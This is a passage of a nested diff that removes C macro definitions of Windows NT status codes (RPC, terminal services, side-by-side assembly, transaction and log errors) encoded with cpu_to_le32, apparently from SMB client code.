+-#define RPC_NT_INVALID_NETWORK_OPTIONS cpu_to_le32(0xC0020019)
+-#define RPC_NT_NO_CALL_ACTIVE cpu_to_le32(0xC002001A)
+-#define RPC_NT_CALL_FAILED cpu_to_le32(0xC002001B)
+-#define RPC_NT_CALL_FAILED_DNE cpu_to_le32(0xC002001C)
+-#define RPC_NT_PROTOCOL_ERROR cpu_to_le32(0xC002001D)
+-#define RPC_NT_UNSUPPORTED_TRANS_SYN cpu_to_le32(0xC002001F)
+-#define RPC_NT_UNSUPPORTED_TYPE cpu_to_le32(0xC0020021)
+-#define RPC_NT_INVALID_TAG cpu_to_le32(0xC0020022)
+-#define RPC_NT_INVALID_BOUND cpu_to_le32(0xC0020023)
+-#define RPC_NT_NO_ENTRY_NAME cpu_to_le32(0xC0020024)
+-#define RPC_NT_INVALID_NAME_SYNTAX cpu_to_le32(0xC0020025)
+-#define RPC_NT_UNSUPPORTED_NAME_SYNTAX cpu_to_le32(0xC0020026)
+-#define RPC_NT_UUID_NO_ADDRESS cpu_to_le32(0xC0020028)
+-#define RPC_NT_DUPLICATE_ENDPOINT cpu_to_le32(0xC0020029)
+-#define RPC_NT_UNKNOWN_AUTHN_TYPE cpu_to_le32(0xC002002A)
+-#define RPC_NT_MAX_CALLS_TOO_SMALL cpu_to_le32(0xC002002B)
+-#define RPC_NT_STRING_TOO_LONG cpu_to_le32(0xC002002C)
+-#define RPC_NT_PROTSEQ_NOT_FOUND cpu_to_le32(0xC002002D)
+-#define RPC_NT_PROCNUM_OUT_OF_RANGE cpu_to_le32(0xC002002E)
+-#define RPC_NT_BINDING_HAS_NO_AUTH cpu_to_le32(0xC002002F)
+-#define RPC_NT_UNKNOWN_AUTHN_SERVICE cpu_to_le32(0xC0020030)
+-#define RPC_NT_UNKNOWN_AUTHN_LEVEL cpu_to_le32(0xC0020031)
+-#define RPC_NT_INVALID_AUTH_IDENTITY cpu_to_le32(0xC0020032)
+-#define RPC_NT_UNKNOWN_AUTHZ_SERVICE cpu_to_le32(0xC0020033)
+-#define EPT_NT_INVALID_ENTRY cpu_to_le32(0xC0020034)
+-#define EPT_NT_CANT_PERFORM_OP cpu_to_le32(0xC0020035)
+-#define EPT_NT_NOT_REGISTERED cpu_to_le32(0xC0020036)
+-#define RPC_NT_NOTHING_TO_EXPORT cpu_to_le32(0xC0020037)
+-#define RPC_NT_INCOMPLETE_NAME cpu_to_le32(0xC0020038)
+-#define RPC_NT_INVALID_VERS_OPTION cpu_to_le32(0xC0020039)
+-#define RPC_NT_NO_MORE_MEMBERS cpu_to_le32(0xC002003A)
+-#define RPC_NT_NOT_ALL_OBJS_UNEXPORTED cpu_to_le32(0xC002003B)
+-#define RPC_NT_INTERFACE_NOT_FOUND cpu_to_le32(0xC002003C)
+-#define RPC_NT_ENTRY_ALREADY_EXISTS cpu_to_le32(0xC002003D)
+-#define RPC_NT_ENTRY_NOT_FOUND cpu_to_le32(0xC002003E)
+-#define RPC_NT_NAME_SERVICE_UNAVAILABLE cpu_to_le32(0xC002003F)
+-#define RPC_NT_INVALID_NAF_ID cpu_to_le32(0xC0020040)
+-#define RPC_NT_CANNOT_SUPPORT cpu_to_le32(0xC0020041)
+-#define RPC_NT_NO_CONTEXT_AVAILABLE cpu_to_le32(0xC0020042)
+-#define RPC_NT_INTERNAL_ERROR cpu_to_le32(0xC0020043)
+-#define RPC_NT_ZERO_DIVIDE cpu_to_le32(0xC0020044)
+-#define RPC_NT_ADDRESS_ERROR cpu_to_le32(0xC0020045)
+-#define RPC_NT_FP_DIV_ZERO cpu_to_le32(0xC0020046)
+-#define RPC_NT_FP_UNDERFLOW cpu_to_le32(0xC0020047)
+-#define RPC_NT_FP_OVERFLOW cpu_to_le32(0xC0020048)
+-#define RPC_NT_CALL_IN_PROGRESS cpu_to_le32(0xC0020049)
+-#define RPC_NT_NO_MORE_BINDINGS cpu_to_le32(0xC002004A)
+-#define RPC_NT_GROUP_MEMBER_NOT_FOUND cpu_to_le32(0xC002004B)
+-#define EPT_NT_CANT_CREATE cpu_to_le32(0xC002004C)
+-#define RPC_NT_INVALID_OBJECT cpu_to_le32(0xC002004D)
+-#define RPC_NT_NO_INTERFACES cpu_to_le32(0xC002004F)
+-#define RPC_NT_CALL_CANCELLED cpu_to_le32(0xC0020050)
+-#define RPC_NT_BINDING_INCOMPLETE cpu_to_le32(0xC0020051)
+-#define RPC_NT_COMM_FAILURE cpu_to_le32(0xC0020052)
+-#define RPC_NT_UNSUPPORTED_AUTHN_LEVEL cpu_to_le32(0xC0020053)
+-#define RPC_NT_NO_PRINC_NAME cpu_to_le32(0xC0020054)
+-#define RPC_NT_NOT_RPC_ERROR cpu_to_le32(0xC0020055)
+-#define RPC_NT_SEC_PKG_ERROR cpu_to_le32(0xC0020057)
+-#define RPC_NT_NOT_CANCELLED cpu_to_le32(0xC0020058)
+-#define RPC_NT_INVALID_ASYNC_HANDLE cpu_to_le32(0xC0020062)
+-#define RPC_NT_INVALID_ASYNC_CALL cpu_to_le32(0xC0020063)
+-#define RPC_NT_PROXY_ACCESS_DENIED cpu_to_le32(0xC0020064)
+-#define RPC_NT_NO_MORE_ENTRIES cpu_to_le32(0xC0030001)
+-#define RPC_NT_SS_CHAR_TRANS_OPEN_FAIL cpu_to_le32(0xC0030002)
+-#define RPC_NT_SS_CHAR_TRANS_SHORT_FILE cpu_to_le32(0xC0030003)
+-#define RPC_NT_SS_IN_NULL_CONTEXT cpu_to_le32(0xC0030004)
+-#define RPC_NT_SS_CONTEXT_MISMATCH cpu_to_le32(0xC0030005)
+-#define RPC_NT_SS_CONTEXT_DAMAGED cpu_to_le32(0xC0030006)
+-#define RPC_NT_SS_HANDLES_MISMATCH cpu_to_le32(0xC0030007)
+-#define RPC_NT_SS_CANNOT_GET_CALL_HANDLE cpu_to_le32(0xC0030008)
+-#define RPC_NT_NULL_REF_POINTER cpu_to_le32(0xC0030009)
+-#define RPC_NT_ENUM_VALUE_OUT_OF_RANGE cpu_to_le32(0xC003000A)
+-#define RPC_NT_BYTE_COUNT_TOO_SMALL cpu_to_le32(0xC003000B)
+-#define RPC_NT_BAD_STUB_DATA cpu_to_le32(0xC003000C)
+-#define RPC_NT_INVALID_ES_ACTION cpu_to_le32(0xC0030059)
+-#define RPC_NT_WRONG_ES_VERSION cpu_to_le32(0xC003005A)
+-#define RPC_NT_WRONG_STUB_VERSION cpu_to_le32(0xC003005B)
+-#define RPC_NT_INVALID_PIPE_OBJECT cpu_to_le32(0xC003005C)
+-#define RPC_NT_INVALID_PIPE_OPERATION cpu_to_le32(0xC003005D)
+-#define RPC_NT_WRONG_PIPE_VERSION cpu_to_le32(0xC003005E)
+-#define RPC_NT_PIPE_CLOSED cpu_to_le32(0xC003005F)
+-#define RPC_NT_PIPE_DISCIPLINE_ERROR cpu_to_le32(0xC0030060)
+-#define RPC_NT_PIPE_EMPTY cpu_to_le32(0xC0030061)
+-#define STATUS_PNP_BAD_MPS_TABLE cpu_to_le32(0xC0040035)
+-#define STATUS_PNP_TRANSLATION_FAILED cpu_to_le32(0xC0040036)
+-#define STATUS_PNP_IRQ_TRANSLATION_FAILED cpu_to_le32(0xC0040037)
+-#define STATUS_PNP_INVALID_ID cpu_to_le32(0xC0040038)
+-#define STATUS_IO_REISSUE_AS_CACHED cpu_to_le32(0xC0040039)
+-#define STATUS_CTX_WINSTATION_NAME_INVALID cpu_to_le32(0xC00A0001)
+-#define STATUS_CTX_INVALID_PD cpu_to_le32(0xC00A0002)
+-#define STATUS_CTX_PD_NOT_FOUND cpu_to_le32(0xC00A0003)
+-#define STATUS_CTX_CLOSE_PENDING cpu_to_le32(0xC00A0006)
+-#define STATUS_CTX_NO_OUTBUF cpu_to_le32(0xC00A0007)
+-#define STATUS_CTX_MODEM_INF_NOT_FOUND cpu_to_le32(0xC00A0008)
+-#define STATUS_CTX_INVALID_MODEMNAME cpu_to_le32(0xC00A0009)
+-#define STATUS_CTX_RESPONSE_ERROR cpu_to_le32(0xC00A000A)
+-#define STATUS_CTX_MODEM_RESPONSE_TIMEOUT cpu_to_le32(0xC00A000B)
+-#define STATUS_CTX_MODEM_RESPONSE_NO_CARRIER cpu_to_le32(0xC00A000C)
+-#define STATUS_CTX_MODEM_RESPONSE_NO_DIALTONE cpu_to_le32(0xC00A000D)
+-#define STATUS_CTX_MODEM_RESPONSE_BUSY cpu_to_le32(0xC00A000E)
+-#define STATUS_CTX_MODEM_RESPONSE_VOICE cpu_to_le32(0xC00A000F)
+-#define STATUS_CTX_TD_ERROR cpu_to_le32(0xC00A0010)
+-#define STATUS_CTX_LICENSE_CLIENT_INVALID cpu_to_le32(0xC00A0012)
+-#define STATUS_CTX_LICENSE_NOT_AVAILABLE cpu_to_le32(0xC00A0013)
+-#define STATUS_CTX_LICENSE_EXPIRED cpu_to_le32(0xC00A0014)
+-#define STATUS_CTX_WINSTATION_NOT_FOUND cpu_to_le32(0xC00A0015)
+-#define STATUS_CTX_WINSTATION_NAME_COLLISION cpu_to_le32(0xC00A0016)
+-#define STATUS_CTX_WINSTATION_BUSY cpu_to_le32(0xC00A0017)
+-#define STATUS_CTX_BAD_VIDEO_MODE cpu_to_le32(0xC00A0018)
+-#define STATUS_CTX_GRAPHICS_INVALID cpu_to_le32(0xC00A0022)
+-#define STATUS_CTX_NOT_CONSOLE cpu_to_le32(0xC00A0024)
+-#define STATUS_CTX_CLIENT_QUERY_TIMEOUT cpu_to_le32(0xC00A0026)
+-#define STATUS_CTX_CONSOLE_DISCONNECT cpu_to_le32(0xC00A0027)
+-#define STATUS_CTX_CONSOLE_CONNECT cpu_to_le32(0xC00A0028)
+-#define STATUS_CTX_SHADOW_DENIED cpu_to_le32(0xC00A002A)
+-#define STATUS_CTX_WINSTATION_ACCESS_DENIED cpu_to_le32(0xC00A002B)
+-#define STATUS_CTX_INVALID_WD cpu_to_le32(0xC00A002E)
+-#define STATUS_CTX_WD_NOT_FOUND cpu_to_le32(0xC00A002F)
+-#define STATUS_CTX_SHADOW_INVALID cpu_to_le32(0xC00A0030)
+-#define STATUS_CTX_SHADOW_DISABLED cpu_to_le32(0xC00A0031)
+-#define STATUS_RDP_PROTOCOL_ERROR cpu_to_le32(0xC00A0032)
+-#define STATUS_CTX_CLIENT_LICENSE_NOT_SET cpu_to_le32(0xC00A0033)
+-#define STATUS_CTX_CLIENT_LICENSE_IN_USE cpu_to_le32(0xC00A0034)
+-#define STATUS_CTX_SHADOW_ENDED_BY_MODE_CHANGE cpu_to_le32(0xC00A0035)
+-#define STATUS_CTX_SHADOW_NOT_RUNNING cpu_to_le32(0xC00A0036)
+-#define STATUS_CTX_LOGON_DISABLED cpu_to_le32(0xC00A0037)
+-#define STATUS_CTX_SECURITY_LAYER_ERROR cpu_to_le32(0xC00A0038)
+-#define STATUS_TS_INCOMPATIBLE_SESSIONS cpu_to_le32(0xC00A0039)
+-#define STATUS_MUI_FILE_NOT_FOUND cpu_to_le32(0xC00B0001)
+-#define STATUS_MUI_INVALID_FILE cpu_to_le32(0xC00B0002)
+-#define STATUS_MUI_INVALID_RC_CONFIG cpu_to_le32(0xC00B0003)
+-#define STATUS_MUI_INVALID_LOCALE_NAME cpu_to_le32(0xC00B0004)
+-#define STATUS_MUI_INVALID_ULTIMATEFALLBACK_NAME cpu_to_le32(0xC00B0005)
+-#define STATUS_MUI_FILE_NOT_LOADED cpu_to_le32(0xC00B0006)
+-#define STATUS_RESOURCE_ENUM_USER_STOP cpu_to_le32(0xC00B0007)
+-#define STATUS_CLUSTER_INVALID_NODE cpu_to_le32(0xC0130001)
+-#define STATUS_CLUSTER_NODE_EXISTS cpu_to_le32(0xC0130002)
+-#define STATUS_CLUSTER_JOIN_IN_PROGRESS cpu_to_le32(0xC0130003)
+-#define STATUS_CLUSTER_NODE_NOT_FOUND cpu_to_le32(0xC0130004)
+-#define STATUS_CLUSTER_LOCAL_NODE_NOT_FOUND cpu_to_le32(0xC0130005)
+-#define STATUS_CLUSTER_NETWORK_EXISTS cpu_to_le32(0xC0130006)
+-#define STATUS_CLUSTER_NETWORK_NOT_FOUND cpu_to_le32(0xC0130007)
+-#define STATUS_CLUSTER_NETINTERFACE_EXISTS cpu_to_le32(0xC0130008)
+-#define STATUS_CLUSTER_NETINTERFACE_NOT_FOUND cpu_to_le32(0xC0130009)
+-#define STATUS_CLUSTER_INVALID_REQUEST cpu_to_le32(0xC013000A)
+-#define STATUS_CLUSTER_INVALID_NETWORK_PROVIDER cpu_to_le32(0xC013000B)
+-#define STATUS_CLUSTER_NODE_DOWN cpu_to_le32(0xC013000C)
+-#define STATUS_CLUSTER_NODE_UNREACHABLE cpu_to_le32(0xC013000D)
+-#define STATUS_CLUSTER_NODE_NOT_MEMBER cpu_to_le32(0xC013000E)
+-#define STATUS_CLUSTER_JOIN_NOT_IN_PROGRESS cpu_to_le32(0xC013000F)
+-#define STATUS_CLUSTER_INVALID_NETWORK cpu_to_le32(0xC0130010)
+-#define STATUS_CLUSTER_NO_NET_ADAPTERS cpu_to_le32(0xC0130011)
+-#define STATUS_CLUSTER_NODE_UP cpu_to_le32(0xC0130012)
+-#define STATUS_CLUSTER_NODE_PAUSED cpu_to_le32(0xC0130013)
+-#define STATUS_CLUSTER_NODE_NOT_PAUSED cpu_to_le32(0xC0130014)
+-#define STATUS_CLUSTER_NO_SECURITY_CONTEXT cpu_to_le32(0xC0130015)
+-#define STATUS_CLUSTER_NETWORK_NOT_INTERNAL cpu_to_le32(0xC0130016)
+-#define STATUS_CLUSTER_POISONED cpu_to_le32(0xC0130017)
+-#define STATUS_ACPI_INVALID_OPCODE cpu_to_le32(0xC0140001)
+-#define STATUS_ACPI_STACK_OVERFLOW cpu_to_le32(0xC0140002)
+-#define STATUS_ACPI_ASSERT_FAILED cpu_to_le32(0xC0140003)
+-#define STATUS_ACPI_INVALID_INDEX cpu_to_le32(0xC0140004)
+-#define STATUS_ACPI_INVALID_ARGUMENT cpu_to_le32(0xC0140005)
+-#define STATUS_ACPI_FATAL cpu_to_le32(0xC0140006)
+-#define STATUS_ACPI_INVALID_SUPERNAME cpu_to_le32(0xC0140007)
+-#define STATUS_ACPI_INVALID_ARGTYPE cpu_to_le32(0xC0140008)
+-#define STATUS_ACPI_INVALID_OBJTYPE cpu_to_le32(0xC0140009)
+-#define STATUS_ACPI_INVALID_TARGETTYPE cpu_to_le32(0xC014000A)
+-#define STATUS_ACPI_INCORRECT_ARGUMENT_COUNT cpu_to_le32(0xC014000B)
+-#define STATUS_ACPI_ADDRESS_NOT_MAPPED cpu_to_le32(0xC014000C)
+-#define STATUS_ACPI_INVALID_EVENTTYPE cpu_to_le32(0xC014000D)
+-#define STATUS_ACPI_HANDLER_COLLISION cpu_to_le32(0xC014000E)
+-#define STATUS_ACPI_INVALID_DATA cpu_to_le32(0xC014000F)
+-#define STATUS_ACPI_INVALID_REGION cpu_to_le32(0xC0140010)
+-#define STATUS_ACPI_INVALID_ACCESS_SIZE cpu_to_le32(0xC0140011)
+-#define STATUS_ACPI_ACQUIRE_GLOBAL_LOCK cpu_to_le32(0xC0140012)
+-#define STATUS_ACPI_ALREADY_INITIALIZED cpu_to_le32(0xC0140013)
+-#define STATUS_ACPI_NOT_INITIALIZED cpu_to_le32(0xC0140014)
+-#define STATUS_ACPI_INVALID_MUTEX_LEVEL cpu_to_le32(0xC0140015)
+-#define STATUS_ACPI_MUTEX_NOT_OWNED cpu_to_le32(0xC0140016)
+-#define STATUS_ACPI_MUTEX_NOT_OWNER cpu_to_le32(0xC0140017)
+-#define STATUS_ACPI_RS_ACCESS cpu_to_le32(0xC0140018)
+-#define STATUS_ACPI_INVALID_TABLE cpu_to_le32(0xC0140019)
+-#define STATUS_ACPI_REG_HANDLER_FAILED cpu_to_le32(0xC0140020)
+-#define STATUS_ACPI_POWER_REQUEST_FAILED cpu_to_le32(0xC0140021)
+-#define STATUS_SXS_SECTION_NOT_FOUND cpu_to_le32(0xC0150001)
+-#define STATUS_SXS_CANT_GEN_ACTCTX cpu_to_le32(0xC0150002)
+-#define STATUS_SXS_INVALID_ACTCTXDATA_FORMAT cpu_to_le32(0xC0150003)
+-#define STATUS_SXS_ASSEMBLY_NOT_FOUND cpu_to_le32(0xC0150004)
+-#define STATUS_SXS_MANIFEST_FORMAT_ERROR cpu_to_le32(0xC0150005)
+-#define STATUS_SXS_MANIFEST_PARSE_ERROR cpu_to_le32(0xC0150006)
+-#define STATUS_SXS_ACTIVATION_CONTEXT_DISABLED cpu_to_le32(0xC0150007)
+-#define STATUS_SXS_KEY_NOT_FOUND cpu_to_le32(0xC0150008)
+-#define STATUS_SXS_VERSION_CONFLICT cpu_to_le32(0xC0150009)
+-#define STATUS_SXS_WRONG_SECTION_TYPE cpu_to_le32(0xC015000A)
+-#define STATUS_SXS_THREAD_QUERIES_DISABLED cpu_to_le32(0xC015000B)
+-#define STATUS_SXS_ASSEMBLY_MISSING cpu_to_le32(0xC015000C)
+-#define STATUS_SXS_PROCESS_DEFAULT_ALREADY_SET cpu_to_le32(0xC015000E)
+-#define STATUS_SXS_EARLY_DEACTIVATION cpu_to_le32(0xC015000F)
+-#define STATUS_SXS_INVALID_DEACTIVATION cpu_to_le32(0xC0150010)
+-#define STATUS_SXS_MULTIPLE_DEACTIVATION cpu_to_le32(0xC0150011)
+-#define STATUS_SXS_SYSTEM_DEFAULT_ACTIVATION_CONTEXT_EMPTY	\
+-	cpu_to_le32(0xC0150012)
+-#define STATUS_SXS_PROCESS_TERMINATION_REQUESTED cpu_to_le32(0xC0150013)
+-#define STATUS_SXS_CORRUPT_ACTIVATION_STACK cpu_to_le32(0xC0150014)
+-#define STATUS_SXS_CORRUPTION cpu_to_le32(0xC0150015)
+-#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_VALUE cpu_to_le32(0xC0150016)
+-#define STATUS_SXS_INVALID_IDENTITY_ATTRIBUTE_NAME cpu_to_le32(0xC0150017)
+-#define STATUS_SXS_IDENTITY_DUPLICATE_ATTRIBUTE cpu_to_le32(0xC0150018)
+-#define STATUS_SXS_IDENTITY_PARSE_ERROR cpu_to_le32(0xC0150019)
+-#define STATUS_SXS_COMPONENT_STORE_CORRUPT cpu_to_le32(0xC015001A)
+-#define STATUS_SXS_FILE_HASH_MISMATCH cpu_to_le32(0xC015001B)
+-#define STATUS_SXS_MANIFEST_IDENTITY_SAME_BUT_CONTENTS_DIFFERENT	\
+-	cpu_to_le32(0xC015001C)
+-#define STATUS_SXS_IDENTITIES_DIFFERENT cpu_to_le32(0xC015001D)
+-#define STATUS_SXS_ASSEMBLY_IS_NOT_A_DEPLOYMENT cpu_to_le32(0xC015001E)
+-#define STATUS_SXS_FILE_NOT_PART_OF_ASSEMBLY cpu_to_le32(0xC015001F)
+-#define STATUS_ADVANCED_INSTALLER_FAILED cpu_to_le32(0xC0150020)
+-#define STATUS_XML_ENCODING_MISMATCH cpu_to_le32(0xC0150021)
+-#define STATUS_SXS_MANIFEST_TOO_BIG cpu_to_le32(0xC0150022)
+-#define STATUS_SXS_SETTING_NOT_REGISTERED cpu_to_le32(0xC0150023)
+-#define STATUS_SXS_TRANSACTION_CLOSURE_INCOMPLETE cpu_to_le32(0xC0150024)
+-#define STATUS_SMI_PRIMITIVE_INSTALLER_FAILED cpu_to_le32(0xC0150025)
+-#define STATUS_GENERIC_COMMAND_FAILED cpu_to_le32(0xC0150026)
+-#define STATUS_SXS_FILE_HASH_MISSING cpu_to_le32(0xC0150027)
+-#define STATUS_TRANSACTIONAL_CONFLICT cpu_to_le32(0xC0190001)
+-#define STATUS_INVALID_TRANSACTION cpu_to_le32(0xC0190002)
+-#define STATUS_TRANSACTION_NOT_ACTIVE cpu_to_le32(0xC0190003)
+-#define STATUS_TM_INITIALIZATION_FAILED cpu_to_le32(0xC0190004)
+-#define STATUS_RM_NOT_ACTIVE cpu_to_le32(0xC0190005)
+-#define STATUS_RM_METADATA_CORRUPT cpu_to_le32(0xC0190006)
+-#define STATUS_TRANSACTION_NOT_JOINED cpu_to_le32(0xC0190007)
+-#define STATUS_DIRECTORY_NOT_RM cpu_to_le32(0xC0190008)
+-#define STATUS_TRANSACTIONS_UNSUPPORTED_REMOTE cpu_to_le32(0xC019000A)
+-#define STATUS_LOG_RESIZE_INVALID_SIZE cpu_to_le32(0xC019000B)
+-#define STATUS_REMOTE_FILE_VERSION_MISMATCH cpu_to_le32(0xC019000C)
+-#define STATUS_CRM_PROTOCOL_ALREADY_EXISTS cpu_to_le32(0xC019000F)
+-#define STATUS_TRANSACTION_PROPAGATION_FAILED cpu_to_le32(0xC0190010)
+-#define STATUS_CRM_PROTOCOL_NOT_FOUND cpu_to_le32(0xC0190011)
+-#define STATUS_TRANSACTION_SUPERIOR_EXISTS cpu_to_le32(0xC0190012)
+-#define STATUS_TRANSACTION_REQUEST_NOT_VALID cpu_to_le32(0xC0190013)
+-#define STATUS_TRANSACTION_NOT_REQUESTED cpu_to_le32(0xC0190014)
+-#define STATUS_TRANSACTION_ALREADY_ABORTED cpu_to_le32(0xC0190015)
+-#define STATUS_TRANSACTION_ALREADY_COMMITTED cpu_to_le32(0xC0190016)
+-#define STATUS_TRANSACTION_INVALID_MARSHALL_BUFFER cpu_to_le32(0xC0190017)
+-#define STATUS_CURRENT_TRANSACTION_NOT_VALID cpu_to_le32(0xC0190018)
+-#define STATUS_LOG_GROWTH_FAILED cpu_to_le32(0xC0190019)
+-#define STATUS_OBJECT_NO_LONGER_EXISTS cpu_to_le32(0xC0190021)
+-#define STATUS_STREAM_MINIVERSION_NOT_FOUND cpu_to_le32(0xC0190022)
+-#define STATUS_STREAM_MINIVERSION_NOT_VALID cpu_to_le32(0xC0190023)
+-#define STATUS_MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION	\
+-	cpu_to_le32(0xC0190024)
+-#define STATUS_CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT cpu_to_le32(0xC0190025)
+-#define STATUS_CANT_CREATE_MORE_STREAM_MINIVERSIONS cpu_to_le32(0xC0190026)
+-#define STATUS_HANDLE_NO_LONGER_VALID cpu_to_le32(0xC0190028)
+-#define STATUS_LOG_CORRUPTION_DETECTED cpu_to_le32(0xC0190030)
+-#define STATUS_RM_DISCONNECTED cpu_to_le32(0xC0190032)
+-#define STATUS_ENLISTMENT_NOT_SUPERIOR cpu_to_le32(0xC0190033)
+-#define STATUS_FILE_IDENTITY_NOT_PERSISTENT cpu_to_le32(0xC0190036)
+-#define STATUS_CANT_BREAK_TRANSACTIONAL_DEPENDENCY cpu_to_le32(0xC0190037)
+-#define STATUS_CANT_CROSS_RM_BOUNDARY cpu_to_le32(0xC0190038)
+-#define STATUS_TXF_DIR_NOT_EMPTY cpu_to_le32(0xC0190039)
+-#define STATUS_INDOUBT_TRANSACTIONS_EXIST cpu_to_le32(0xC019003A)
+-#define STATUS_TM_VOLATILE cpu_to_le32(0xC019003B)
+-#define STATUS_ROLLBACK_TIMER_EXPIRED cpu_to_le32(0xC019003C)
+-#define STATUS_TXF_ATTRIBUTE_CORRUPT cpu_to_le32(0xC019003D)
+-#define STATUS_EFS_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC019003E)
+-#define STATUS_TRANSACTIONAL_OPEN_NOT_ALLOWED cpu_to_le32(0xC019003F)
+-#define STATUS_TRANSACTED_MAPPING_UNSUPPORTED_REMOTE cpu_to_le32(0xC0190040)
+-#define STATUS_TRANSACTION_REQUIRED_PROMOTION cpu_to_le32(0xC0190043)
+-#define STATUS_CANNOT_EXECUTE_FILE_IN_TRANSACTION cpu_to_le32(0xC0190044)
+-#define STATUS_TRANSACTIONS_NOT_FROZEN cpu_to_le32(0xC0190045)
+-#define STATUS_TRANSACTION_FREEZE_IN_PROGRESS cpu_to_le32(0xC0190046)
+-#define STATUS_NOT_SNAPSHOT_VOLUME cpu_to_le32(0xC0190047)
+-#define STATUS_NO_SAVEPOINT_WITH_OPEN_FILES cpu_to_le32(0xC0190048)
+-#define STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190049)
+-#define STATUS_TM_IDENTITY_MISMATCH cpu_to_le32(0xC019004A)
+-#define STATUS_FLOATED_SECTION cpu_to_le32(0xC019004B)
+-#define STATUS_CANNOT_ACCEPT_TRANSACTED_WORK cpu_to_le32(0xC019004C)
+-#define STATUS_CANNOT_ABORT_TRANSACTIONS cpu_to_le32(0xC019004D)
+-#define STATUS_TRANSACTION_NOT_FOUND cpu_to_le32(0xC019004E)
+-#define STATUS_RESOURCEMANAGER_NOT_FOUND cpu_to_le32(0xC019004F)
+-#define STATUS_ENLISTMENT_NOT_FOUND cpu_to_le32(0xC0190050)
+-#define STATUS_TRANSACTIONMANAGER_NOT_FOUND cpu_to_le32(0xC0190051)
+-#define STATUS_TRANSACTIONMANAGER_NOT_ONLINE cpu_to_le32(0xC0190052)
+-#define STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION	\
+-	cpu_to_le32(0xC0190053)
+-#define STATUS_TRANSACTION_NOT_ROOT cpu_to_le32(0xC0190054)
+-#define STATUS_TRANSACTION_OBJECT_EXPIRED cpu_to_le32(0xC0190055)
+-#define STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190056)
+-#define STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED cpu_to_le32(0xC0190057)
+-#define STATUS_TRANSACTION_RECORD_TOO_LONG cpu_to_le32(0xC0190058)
+-#define STATUS_NO_LINK_TRACKING_IN_TRANSACTION cpu_to_le32(0xC0190059)
+-#define STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION cpu_to_le32(0xC019005A)
+-#define STATUS_TRANSACTION_INTEGRITY_VIOLATED cpu_to_le32(0xC019005B)
+-#define STATUS_LOG_SECTOR_INVALID cpu_to_le32(0xC01A0001)
+-#define STATUS_LOG_SECTOR_PARITY_INVALID cpu_to_le32(0xC01A0002)
+-#define STATUS_LOG_SECTOR_REMAPPED cpu_to_le32(0xC01A0003)
+-#define STATUS_LOG_BLOCK_INCOMPLETE cpu_to_le32(0xC01A0004)
+-#define STATUS_LOG_INVALID_RANGE cpu_to_le32(0xC01A0005)
+-#define STATUS_LOG_BLOCKS_EXHAUSTED cpu_to_le32(0xC01A0006)
+-#define STATUS_LOG_READ_CONTEXT_INVALID cpu_to_le32(0xC01A0007)
+-#define STATUS_LOG_RESTART_INVALID cpu_to_le32(0xC01A0008)
+-#define STATUS_LOG_BLOCK_VERSION cpu_to_le32(0xC01A0009)
+-#define STATUS_LOG_BLOCK_INVALID cpu_to_le32(0xC01A000A)
+-#define STATUS_LOG_READ_MODE_INVALID cpu_to_le32(0xC01A000B)
+-#define STATUS_LOG_METADATA_CORRUPT cpu_to_le32(0xC01A000D)
+-#define STATUS_LOG_METADATA_INVALID cpu_to_le32(0xC01A000E)
+-#define STATUS_LOG_METADATA_INCONSISTENT cpu_to_le32(0xC01A000F)
+-#define STATUS_LOG_RESERVATION_INVALID cpu_to_le32(0xC01A0010)
+-#define STATUS_LOG_CANT_DELETE cpu_to_le32(0xC01A0011)
+-#define STATUS_LOG_CONTAINER_LIMIT_EXCEEDED cpu_to_le32(0xC01A0012)
+-#define STATUS_LOG_START_OF_LOG cpu_to_le32(0xC01A0013)
+-#define STATUS_LOG_POLICY_ALREADY_INSTALLED cpu_to_le32(0xC01A0014)
+-#define STATUS_LOG_POLICY_NOT_INSTALLED cpu_to_le32(0xC01A0015)
+-#define STATUS_LOG_POLICY_INVALID cpu_to_le32(0xC01A0016)
+-#define STATUS_LOG_POLICY_CONFLICT cpu_to_le32(0xC01A0017)
+-#define STATUS_LOG_PINNED_ARCHIVE_TAIL cpu_to_le32(0xC01A0018)
+-#define STATUS_LOG_RECORD_NONEXISTENT cpu_to_le32(0xC01A0019)
+-#define STATUS_LOG_RECORDS_RESERVED_INVALID cpu_to_le32(0xC01A001A)
+-#define STATUS_LOG_SPACE_RESERVED_INVALID cpu_to_le32(0xC01A001B)
+-#define STATUS_LOG_TAIL_INVALID cpu_to_le32(0xC01A001C)
+-#define STATUS_LOG_FULL cpu_to_le32(0xC01A001D)
+-#define STATUS_LOG_MULTIPLEXED cpu_to_le32(0xC01A001E)
+-#define STATUS_LOG_DEDICATED cpu_to_le32(0xC01A001F)
+-#define STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS cpu_to_le32(0xC01A0020)
+-#define STATUS_LOG_ARCHIVE_IN_PROGRESS cpu_to_le32(0xC01A0021)
+-#define STATUS_LOG_EPHEMERAL cpu_to_le32(0xC01A0022)
+-#define STATUS_LOG_NOT_ENOUGH_CONTAINERS cpu_to_le32(0xC01A0023)
+-#define STATUS_LOG_CLIENT_ALREADY_REGISTERED cpu_to_le32(0xC01A0024)
+-#define STATUS_LOG_CLIENT_NOT_REGISTERED cpu_to_le32(0xC01A0025)
+-#define STATUS_LOG_FULL_HANDLER_IN_PROGRESS cpu_to_le32(0xC01A0026)
+-#define STATUS_LOG_CONTAINER_READ_FAILED cpu_to_le32(0xC01A0027)
+-#define STATUS_LOG_CONTAINER_WRITE_FAILED cpu_to_le32(0xC01A0028)
+-#define STATUS_LOG_CONTAINER_OPEN_FAILED cpu_to_le32(0xC01A0029)
+-#define STATUS_LOG_CONTAINER_STATE_INVALID cpu_to_le32(0xC01A002A)
+-#define STATUS_LOG_STATE_INVALID cpu_to_le32(0xC01A002B)
+-#define STATUS_LOG_PINNED cpu_to_le32(0xC01A002C)
+-#define STATUS_LOG_METADATA_FLUSH_FAILED cpu_to_le32(0xC01A002D)
+-#define STATUS_LOG_INCONSISTENT_SECURITY cpu_to_le32(0xC01A002E)
